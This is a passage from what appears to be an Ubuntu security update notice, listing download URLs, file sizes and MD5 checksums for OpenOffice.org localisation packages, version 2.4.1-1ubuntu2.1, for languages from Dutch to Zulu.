    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-nl_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:  1379918 48015e42b02cf2f888039f033d67fe0b
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-nn_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   378830 7c233cd494763c121e5404ce346c5219
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-nr_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   403230 c42a08ebf1bae55509b3144b7c0c283f
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-ns_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   395838 650942fc19ae6216b1b86e89d66f7f8f
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-or-in_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   401520 c4326301d4b055f4158ae6e62a8a2fe2
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-pa-in_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   397976 3d77f394280cd9477d650167ef4782cb
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-pl_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:  1344054 054f1656cd1048041ac1d60574c422a4
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-pt-br_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:  1343860 e050d8e768bf85c191ceb58e6cf31cb9
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-pt_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:  1396070 8dd9e6369d02729163a23e07ded3840f
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-ro_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   333130 00dc5e75bbf8d6f5705a7e1c9d21a770
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-ru_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:  1351626 45ce1dd032c805792443973dbe519205
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-rw_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   385396 47133c6c7e6caa3895e6fadc2568d4cf
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-sk_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:  1403292 ef3f713fd0a00ecdbca5421783a846e7
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-sl_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:  1427328 96da10ac580d494673fc736e10d5347f
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-sr_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   400068 cfb6b7a9c3f07b58856f497f77d20a9f
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-ss_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   396660 f3ed6214c454beae54da3c8fd6f1815e
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-st_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   396808 db5c8774252cddb451ba6108107e1bb3
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-sv_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:  1317536 403537ee603a0129e8d165db6cbcb7ab
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-sw_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   319206 70a4233546c2bee5f6db28d5f260d6f3
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-ta-in_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   401000 e2686c75c5aeaf20a6b11a1cb9962510
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-te-in_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   409040 1e5bb9e95a4061571e0870d3937a9ea9
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-tg_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   392478 fb0d24ac8d7f1fe5ff6e4431e441a723
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-th_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   401610 16f69b2510e2053072f812c05e62bd22
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-ti-er_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   340136 0cd583e8eb0fe794ef269af65e4b6532
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-tn_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   366112 21a09f2cd76067fef85ff6e7281bab7b
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-tr_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   811354 ebd1246830607c78071b5ffb015e1771
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-ts_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   395648 1a8ecc582426eb11687ae1799c1164fc
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-uk_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   400234 d652cbd6d62b437b5fa75394a77bfed6
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-ur-in_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   400918 cdd50532affdbf2c16f74ca8cbe787e4
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-uz_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   386602 ae8022fc2d8705d83b8f3f86162f0a67
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-ve_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   399664 2ed0b9c6a1e0167b7b70aaa700fbe0bc
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-vi_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   384612 a842af4620ea6631c59b91e69ef92844
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-xh_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   405858 80d29f090504cc43f64d2eae8563cf31
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-zh-cn_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:  1395414 8b880da4a72441c52e60f0c0d6611702
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-zh-tw_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:  1382284 2a9a7a61bbd4abc34a86b24db7084b9d
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-zu_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   398030 6c8aaed045da4ce55c4cc312e0b4aa1f




